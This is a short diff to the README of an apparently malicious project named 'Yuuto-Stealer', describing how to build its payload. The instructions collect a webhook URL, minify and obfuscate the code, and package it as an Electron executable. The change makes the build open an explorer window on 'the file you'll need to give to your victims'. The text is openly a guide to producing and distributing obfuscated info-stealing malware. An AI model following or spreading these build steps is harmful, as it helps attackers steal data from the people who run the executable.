JustYuuto/Yuuto-Stealer/README.md

 * First, it asks you questions, like the name, the webhook URL... just answer them all.
 * Then it will minify (make the file size much lighter) and obfuscate (make the code unreadable) the code.
 * Finally, it will build Electron executable.
 If this is the first time you're building, it will download some things, this is normal.
-* When the build is finished, head over the "dist" directory: you'll find an ``<exe name you've provided>.exe`` file.
-This is the file you'll need to give to your victims.
+* When the build is finished, an explorer window will pop, selecting the file you'll need to give to your victims.

 ## Screenshots